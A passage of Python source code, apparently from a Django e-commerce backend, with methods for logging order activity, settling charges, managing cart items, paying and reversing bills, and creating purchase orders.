request=self.transaction_payload(payload),\\\n\t\t\t\t\t\t\tresponse_status=response_status, sends=0, status=status, \\\n\t\t\t\t\t\t\tchannel=channel, gateway=gateway_profile.gateway)\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tif 'scheduled_send' in payload.keys() and payload['scheduled_send'] not in [\"\",None]:\n\t\t\t\t\t\ttry:date_obj = datetime.strptime(payload[\"scheduled_send\"], '%d/%m/%Y %I:%M %p')\n\t\t\t\t\t\texcept: date_obj = None\n\t\t\t\t\t\tif date_obj is not None:\t\t\n\t\t\t\t\t\t\tprofile_tz = pytz.timezone(gateway_profile.profile.timezone)\n\t\t\t\t\t\t\tscheduled_send = pytz.timezone(gateway_profile.profile.timezone).localize(date_obj)\n\t\t\t\t\t\t\tlgr.info(\"Send Scheduled: %s\" % scheduled_send)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tscheduled_send = timezone.now()+timezone.timedelta(seconds=1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tscheduled_send = timezone.now()+timezone.timedelta(seconds=1)\n\n\t\t\t\t\torder_activity.scheduled_send = scheduled_send\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tif 'ext_inbound_id' in payload.keys() and payload['ext_inbound_id'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.ext_inbound_id = payload['ext_inbound_id']\n\t\t\t\t\telif 'bridge__transaction_id' in payload.keys():\n\t\t\t\t\t\torder_activity.ext_inbound_id = payload['bridge__transaction_id']\n\n\t\t\t\t\tif 'currency' in payload.keys() and payload['currency'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.currency = Currency.objects.get(code=payload['currency'])\n\t\t\t\t\tif 'amount' in payload.keys() and payload['amount'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.amount = Decimal(payload['amount'])\n\t\t\t\t\tif 'charge' in payload.keys() and payload['charge'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.charge = Decimal(payload['charge'])\n\n\t\t\t\t\torder_activity.save()\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tpayload['response'] = 'Order Activity Logged'\n\t\t\t\t\tpayload['response_status'] = '00'\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = 'Order Activity product not found'\n\t\t\t\t\tpayload['response_status'] = '92'\n\n\t\t\texcept ProductItem.DoesNotExist:\n\t\t\t\tlgr.info(\"ProdutItem Does not Exist\")\n\t\t\t\tpayload['response_status'] = '25'\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Order Activity: %s\" % e)\n\t\treturn payload\n\n\n\tdef settle_order_charges(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tamount = Decimal(payload['amount'])\n\t\t\tcharge = Decimal(0)\n\n\t\t\tif 'institution_id' in payload.keys():\n\t\t\t\tcharge_list = OrderCharge.objects.filter(institution__id=payload['institution_id'], min_amount__lte=Decimal(amount), order_product__service__name=payload['SERVICE'],\\\n\t\t\t\t\t\tmax_amount__gte=Decimal(amount))\n\t\t\telif 'product_item_id' in payload.keys():\n\t\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\t\tpayload['institution_id'] = product_item.institution.id\n\t\t\t\tcharge_list = OrderCharge.objects.filter(institution=product_item.institution, min_amount__lte=Decimal(amount), order_product__service__name=payload['SERVICE'],\\\n\t\t\t\t\t\tmax_amount__gte=Decimal(amount))\n\t\t\telse:\n\t\t\t\tcharge_list = OrderCharge.objects.none()\n\n\n\t\t\tif 'payment_method' in payload.keys():\n\t\t\t\tcharge_list = charge_list.filter(Q(payment_method__name=payload['payment_method'])|Q(payment_method=None))\n\n\t\t\tfor c in charge_list:\n\t\t\t\tif c.is_percentage:\n\t\t\t\t\tcharge = charge + ((c.charge_value/100)*Decimal(amount))\n\t\t\t\telse:\n\t\t\t\t\tcharge = charge+c.charge_value\t\t\n\n\t\t\tpayload['amount'] = amount - charge\n\t\t\tpayload['charge'] = charge\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload['response'] = \"Order Charges Settled\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"error settle order charges: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef settle_paid_orders(self, payload, node_info):\n\t\ttry:\n\t\t\t\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tbill_manager_list = BillManager.objects.filter(order__status__name='PAID',order__cart_item__status__name='PAID')\n\t\t\tif gateway_profile.institution:\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__institution=gateway_profile.institution)\n\t\t\telif 'institution_id' in payload.keys():\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__institution__id=payload['institution_id'])\n\t\t\telse:\n\t\t\t\tbill_manager_list = bill_manager_list.none()\n\n\t\t\tif 'product_type_list' in payload.keys():\n\t\t\t\t#product_type_list = '23,65,123,35,563,34,42'\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__product_type__id__in=[p for p in payload['product_type_list'].split(',') if p])\n\n\t\t\tsettled_amount = Decimal(0)\n\t\t\tif bill_manager_list.exists():\n\t\t\t\tsettled_amount = bill_manager_list.aggregate(Sum('balance_bf'))['balance_bf__sum']\n\t\t\t\tsettle_orders.delay(np.unique(np.asarray(bill_manager_list.values_list('order__id',flat=True))).tolist())\n\n\t\t\tpayload['settled_amount'] = settled_amount\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload['response'] = \"Settled: %s\" % settled_amount\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"error settling paid ordes: %s\" % e)\n\n\t\treturn payload\n\n\tdef create_sale_charge(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\n\t\t\tsale_charge_type = SaleChargeType(name=product_item.name, description=product_item.description,\\\n\t\t\t\t\t\t\tproduct_item=product_item)\n\t\t\tsale_charge_type.save()\n\t\t\tsale_charge = SaleCharge(sale_charge_type=sale_charge_type,description=product_item.description)\n\t\t\tif 'credit' in payload.keys() and payload['credit']:\n\t\t\t\tsale_charge.credit = True\n\n\t\t\tsale_charge.min_amount = payload['min_amount'] if 'min_amount' in payload.keys() else 0\n\t\t\tsale_charge.max_amount = payload['max_amount'] if 'max_amount' in payload.keys() else 999999\n\t\t\tsale_charge.charge_value = payload['charge_value'] if 'charge_value' in payload.keys() else 0\n\n\t\t\tif 'is_percentage' in payload.keys() and payload['is_percentage']:\n\t\t\t\tsale_charge.is_percentage = True\n\t\t\tif 'main_location' in payload.keys():\n\t\t\t\tcoordinates = payload['main_location']\n\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\tsale_charge.main_location = trans_point\n\n\t\t\tif 'min_distance' in payload.keys(): sale_charge.min_distance = payload['min_distance']\n\t\t\tif 'max_distance' in payload.keys(): sale_charge.max_distance = payload['max_distance']\n\t\t\tif 'charge_per_km' in payload.keys(): sale_charge.charge_per_km = payload['charge_per_km']\n\t\t\tif 'per_item' in payload.keys() and payload['per_item']:\n\t\t\t\tsale_charge.max_distance = payload['max_distance']\n\n\t\t\tsale_charge.save()\n\n\t\t\tsale_charge.product_display.add(ProductDisplay.objects.get(name='SHOP'))\n\t\t\tsale_charge.product_type.add(ProductType.objects.get(id=111))\n\t\t\tsale_charge.institution.add(gateway_profile.institution)\n\t\t\tsale_charge.gateway.add(gateway_profile.gateway)\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Charge Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Charge: %s\" % e)\n\t\treturn payload\n\n\n\tdef delete_cart_item_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tpayload['total'] = cart_item.total\n\t\t\tpayload['sub_total'] = cart_item.sub_total\n\t\t\tpayload['quantity'] = cart_item.quantity\n\t\t\tpayload['price'] = cart_item.price\n\t\t\tpayload['product_item_id'] = cart_item.product_item.id\n\t\t\tpayload['cat_item_status'] = cart_item.status.name\n\t\t\tpayload['details'] = json.loads(cart_item.details)\n\n\n\t\t\tif cart_item.product_item.uneditable:\n\t\t\t\tpayload['trigger'] = 'uneditable_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'editable_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Cart Item Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Cart Items: %s\" % e)\n\t\treturn payload\n\n\n\tdef update_cart_item_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tpayload['total'] = cart_item.total\n\t\t\tpayload['sub_total'] = cart_item.sub_total\n\t\t\tpayload['quantity'] = cart_item.quantity\n\t\t\tpayload['price'] = cart_item.price\n\t\t\tpayload['product_item_id'] = cart_item.product_item.id\n\t\t\tpayload['cat_item_status'] = cart_item.status.name\n\t\t\tpayload['details'] = json.loads(cart_item.details)\n\n\n\t\t\tif cart_item.product_item.product_type.name == 'Location':\n\t\t\t\tpayload['trigger'] = 'location_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'quantity_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Cart Item Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Cart Items: %s\" % e)\n\t\treturn payload\n\n\tdef update_cart_item(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tproduct_item = cart_item.product_item\n\n\t\t\tquantity = Decimal(payload['quantity']) if 'quantity' in payload.keys() else Decimal(1)\n\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\ttotal = sub_total\n\n\t\t\tif 'quantity' not in payload.keys() and product_item.variable_unit and 'amount' in payload.keys():\n\t\t\t\tquantity = Decimal(Decimal(payload['amount'])/product_item.unit_cost).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\ttotal = sub_total\n\n\t\t\tcart_item.quantity = quantity\n\t\t\tcart_item.sub_total = sub_total\n\t\t\tcart_item.total = total\n\t\t\tcart_item.pn = False\n\t\t\tcart_item.save()\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Updated Cart Item\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Update Cart Item: %s\" % e)\n\t\treturn payload\n\n\tdef delete_cart_item(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tcart_item.status = CartStatus.objects.get(name='DELETED')\n\t\t\tcart_item.pn = False\n\t\t\tcart_item.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Deleted Cart Item\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Delete Cart Item: %s\" % e)\n\t\treturn payload\n\n\tdef window_event(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Window Event\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on window event: %s\" % e)\n\t\treturn payload\n\n\n\tdef allow_cash_on_delivery(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'purchase_order_id' in payload.keys() and 'amount' in payload.keys() and 'currency' in payload.keys():\n\t\t\t\tpayload['balance_bf'] = payload['amount']\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Allowed: %s %s to cash on delivery\" % (payload['currency'], payload['amount'])\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"Bill Detail(s) missing\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on allowing cash on delivery: %s\" % e)\n\t\treturn payload\n\n\n\tdef check_order_status(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name__in=['UNPAID','PAID']).order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\tcart_items = bill_manager_list[0].order.cart_item.all()\n\t\t\t\t\tif cart_items.exists():\n\t\t\t\t\t\t#Takes up the institution with the most products\n\t\t\t\t\t\tproduct_institution = cart_items.values('product_item__institution__id').annotate(Count('product_item__institution__id')).order_by('-product_item__institution__id__count')\n\t\t\t\t\t\tif product_institution.count() == 1:\n\t\t\t\t\t\t\tpayload['institution_id'] = product_institution[0]['product_item__institution__id']\n\t\t\t\t\tpayload['amount'] = str(bill_manager_list[0].balance_bf)\n\t\t\t\t\tpayload['currency'] = bill_manager_list[0].order.currency.code\n\t\t\t\t\tpayload['purchase_order_id'] = bill_manager_list[0].order.id\n\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif bill_manager_list.filter(order__status__name='UNPAID').exists():\n\t\t\t\t\t\tpayload['trigger'] = 'unpaid_order%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\t\tpayload[\"response\"] = \"Unpaid Order\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload['trigger'] = 'paid_order%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\t\tpayload[\"response\"] = \"Paid Order\"\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef get_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name='UNPAID').order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\tcart_items = bill_manager_list[0].order.cart_item.all()\n\t\t\t\t\tif cart_items.exists():\n\t\t\t\t\t\t#Takes up the institution with the most products\n\t\t\t\t\t\tproduct_institution = cart_items.values('product_item__institution__id').annotate(Count('product_item__institution__id')).order_by('-product_item__institution__id__count')\n\t\t\t\t\t\tif product_institution.count() == 1:\n\t\t\t\t\t\t\tpayload['institution_id'] = product_institution[0]['product_item__institution__id']\n\t\t\t\t\tpayload['amount'] = str(bill_manager_list[0].balance_bf)\n\t\t\t\t\tpayload['currency'] = bill_manager_list[0].order.currency.code\n\t\t\t\t\tpayload['purchase_order_id'] = bill_manager_list[0].order.id\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"Bill Balance: %s\" % bill_manager_list[0].balance_bf\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef reverse_pay_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\n\t\t\t\t#Update as unpaid in all cases\n\t\t\t\tstatus = OrderStatus.objects.get(name='UNPAID')\n\t\t\t\tcart_status = CartStatus.objects.get(name='UNPAID')\n\n\t\t\t\tpurchase_order.status = status\n\t\t\t\tpurchase_order.save()\n\t\t\t\tpurchase_order.cart_item.all().update(status=cart_status)\n\n\t\t\t\t#Reverse if a credit (Pay Bill) Exists\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order=purchase_order).order_by(\"-date_created\")[:1]\n\t\t\t\tif bill_manager_list.exists() and bill_manager_list[0].credit:\n\t\t\t\t\torder = bill_manager_list[0].order\n\t\t\t\t\tbalance_bf = bill_manager_list[0].amount + bill_manager_list[0].balance_bf\n\n\t\t\t\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\t\t\tbill_manager = BillManager(credit=False,transaction_reference=transaction_reference,\\\n\t\t\t\t\t\t\taction_reference=payload['action_id'],order=order,\\\n\t\t\t\t\t\t\tamount=balance_bf,\\\n\t\t\t\t\t\t\tbalance_bf=balance_bf)\n\n\t\t\t\t\tbill_manager.save()\n\n\t\t\t\t\tpayload['amount'] = bill_manager.amount\n\t\t\t\t\tpayload['purchase_order_id'] = order.id\n\t\t\t\t\tpayload[\"response\"] = \"Bill Reversed. Balance: %s\" % bill_manager.balance_bf\n\t\t\t\telse:\n\t\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\tpayload[\"response\"] = \"No Bill to Reverse\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"No Order to Reverse\"\n\t\t\t#All are successes\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on reverse pay bill: %s\" % e)\n\t\treturn payload\n\n\n\tdef pay_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name='UNPAID', order__expiry__gte=timezone.now()).order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\torder = bill_manager_list[0].order\n\t\t\t\t\tamount = Decimal(payload['balance_bf'])\n\n\t\t\t\t\t#If currency does not match purchase_order currency (FOREX) and replace amount & currency in payload\n\t\t\t\t\tcurrency = Currency.objects.get(code=payload['currency'])\n\t\t\t\t\tif currency != order.currency:\n\t\t\t\t\t\torder_currency = order.currency\n\t\t\t\t\t\tforex = Forex.objects.filter(base_currency=order_currency, quote_currency=currency)\n\t\t\t\t\t\tif forex.exists():\n\t\t\t\t\t\t\tamount = (amount/forex[0].exchange_rate).quantize(Decimal('.01'), rounding=ROUND_UP)\n\t\t\t\t\t\tlgr.info('Forex Calculate balance_bf to %s|from: %s| %s' % (order_currency, currency, amount) )\n\n\t\t\t\t\tif amount > 0:\n\n\t\t\t\t\t\tif bill_manager_list[0].balance_bf <= amount:\n\t\t\t\t\t\t\t#payment balance_bf is greater than outstanding bill\n\t\t\t\t\t\t\tbalance_bf = 0\n\t\t\t\t\t\t\t#transacting amount refers to the deduction for bill amount only\n\t\t\t\t\t\t\ttransacting_amount = bill_manager_list[0].balance_bf\n\t\t\t\t\t\t\t#Resets query so transacting amount must have been captured\n\t\t\t\t\t\t\tstatus = OrderStatus.objects.get(name='PAID')\n\t\t\t\t\t\t\torder.status = status\n\t\t\t\t\t\t\torder.save()\n\t\t\t\t\t\t\torder.cart_item.all().update(status=CartStatus.objects.get(name='PAID'))\n\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t#payment balance_bf is less than outstanding bill\n\t\t\t\t\t\t\tbalance_bf = bill_manager_list[0].balance_bf - amount\n\n\t\t\t\t\t\t\t#transacting amount refers to the deduction for bill amount only\n\t\t\t\t\t\t\ttransacting_amount = amount\n\n\t\t\t\t\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\t\t\t\tbill_manager = BillManager(credit=True,transaction_reference=transaction_reference,\\\n\t\t\t\t\t\t\t\taction_reference=payload['action_id'],order=order,\\\n\t\t\t\t\t\t\t\tamount=transacting_amount,\\\n\t\t\t\t\t\t\t\tbalance_bf=Decimal(balance_bf).quantize(Decimal('.01'), rounding=ROUND_DOWN))\n\t\t\t\t\t\tbill_manager.payment_method = PaymentMethod.objects.get(name=payload['payment_method'])\n\n\t\t\t\t\t\tif 'paygate_incoming_id' in payload.keys():\n\t\t\t\t\t\t\tbill_manager.incoming_payment = Incoming.objects.get(id=payload['paygate_incoming_id'])\n\n\t\t\t\t\t\tbill_manager.save()\n\n\n\t\t\t\t\t\tamount = bill_manager.amount\n\t\t\t\t\t\tif currency != order.currency:\n\t\t\t\t\t\t\torder_currency = order.currency\n\t\t\t\t\t\t\tforex = Forex.objects.filter(base_currency=order_currency, quote_currency=currency)\n\t\t\t\t\t\t\tif forex.exists():\n\t\t\t\t\t\t\t\tamount = Decimal(amount*forex[0].exchange_rate).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\t\t\t\tlgr.info('Forex Calculate amount to %s|from: %s| %s' % (order_currency, currency, amount) )\n\n\t\t\t\t\t\tpayload['bill_manager_id'] = bill_manager.id\n\t\t\t\t\t\tpayload['amount'] = amount\n\t\t\t\t\t\tpayload['purchase_order_id'] = order.id\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tpayload[\"response\"] = \"Bill Payment Accepted. Balance: %s\" % bill_manager.balance_bf\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tpayload[\"response\"] = \"No Amount to pay outstanding bill\"\n\t\t\t\telse:\n\t\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\tdef add_to_purchase_order(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#Ensure cart product items tills match, and cart item is not added to any other purchase order\n\t\t\tcart_items = CartItem.objects.filter(id__in=str(payload['cart_items'].strip()).split(','),purchaseorder=None)\n\n\t\t\tif cart_items.exists():\n\t\t\t\t#get greates reference from un-expired/unpaid list (expiry after 15days)\n\t\t\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\t\t\telse:\n\t\t\t\t\tsession_gateway_profile = gateway_profile\n\n\t\t\t\tbill_manager = BillManager.objects.filter(order__gateway_profile=session_gateway_profile).order_by('-date_created')\n\n\t\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\t\tbill_manager = bill_manager.filter(order__id=payload['purchase_order_id'])\n\t\t\t\telif 'reference' in payload.keys():\n\t\t\t\t\treference = payload['reference'].strip()\n\t\t\t\t\tbill_manager = bill_manager.filter(order__reference__iexact=reference)\n\t\t\t\telif 'transaction_reference' in payload.keys():\n\t\t\t\t\tbill_manager_extract = bill_manager.filter(transaction_reference = payload['transaction_reference'])\n\t\t\t\t\tif bill_manager_extract.exists(): bill_manager = bill_manager.filter(order=bill_manager_extract[0].order)\n\t\t\t\t\telse: bill_manager = bill_manager.none()\n\t\t\t\telse:\n\t\t\t\t\tbill_manager = bill_manager.none()\n\t\t\t\tif bill_manager.exists():\n\t\t\t\t\tbalance_bf = bill_manager[0].balance_bf\n\t\t\t\t\tfor item in cart_items:\n\t\t\t\t\t\tpurchase_order = bill_manager[0].order\n\t\t\t\t\t\tbalance_bf = self.get_balance_bf(item, purchase_order, balance_bf)\n\t\t\t\t\t\t#Primary Item Bill Entry\n\t\t\t\t\t\tbill_manager = self.bill_entry(item, purchase_order, balance_bf, payload)\n\n\t\t\t\t\t\tbalance_bf = self.sale_charge_bill_entry(balance_bf, item, payload, purchase_order, gateway_profile.gateway)\n\n\t\t\t\t\tpayload['reference'] = purchase_order.reference\n\n\t\t\t\t\tpayload['purchase_order_id'] = purchase_order.id\n\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"Purchase Order Created\"\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No order Found\"\n\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Cart Items Found\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on creating purchase order: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\n\tdef create_purchase_order(self, payload, node_info):\n\t\ttry:\n\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#Ensure cart product items tills match\n\t\t\tcart_items = CartItem.objects.filter(id__in=str(payload['cart_items'].strip()).split(','),\\\n\t\t\t\t\t status=CartStatus.objects.get(name='UNPAID'))\n\n\t\t\tif cart_items.exists():\n\t\t\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\t\t\telse:\n\t\t\t\t\tsession_gateway_profile = gateway_profile\n\t\t\t\t\tsession_gateway_profile_system = GatewayProfile.objects.get(gateway=gateway_profile.gateway,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user__username='System@User',status__name='ACTIVATED')\n\n\t\t\t\t#creates reference from un-expired&unpaid list (expiry after 15days)\n\n\t\t\t\tdef reference(pre_reference):\n\t\t\t\t\tchars = string.ascii_letters \n\t\t\t\t\tnums = string.digits\n\t\t\t\t\trnd = random.SystemRandom()\n\t\t\t\t\tprefix = ''.join(rnd.choice(chars) for i in range(3))\n\t\t\t\t\tsuffix = ''.join(rnd.choice(nums) for i in range(2,4))\n\t\t\t\t\ttrial = '%s-%s%s' % (''.join(re.findall(r'[\\d\\w]+', pre_reference)).upper()[:4], prefix.upper(), suffix)\n\t\t\t\t\t#reference_list = PurchaseOrder.objects.filter(reference=trial,status__name='UNPAID',\\\n\t\t\t\t\t#\t\texpiry__gte=timezone.now()).order_by('-reference')[:1]\n\n\t\t\t\t\treference_list = PurchaseOrder.objects.filter(reference=trial, expiry__gte=timezone.now()).order_by('-reference')[:1]\n\t\t\t\t\tif reference_list.exists():\n\t\t\t\t\t\treturn reference(pre_reference)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn trial\n\n\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\treference_order = PurchaseOrder.objects.filter(status__name='UNPAID', reference__iexact=payload['reference'], expiry__gte=timezone.now(), \n\t\t\t\t\t\t\t\tcart_item__product_item__institution__id__in=[i['product_item__institution__id'] \\\n\t\t\t\t\t\t\t\tfor i in cart_items.values('product_item__institution__id').distinct('product_item__institution__id')])\n\t\t\t\t\tif reference_order.exists(): reference_order.update(status=OrderStatus.objects.get(name='CANCELLED'))\t\t\t\n\t\t\t\t\treference = 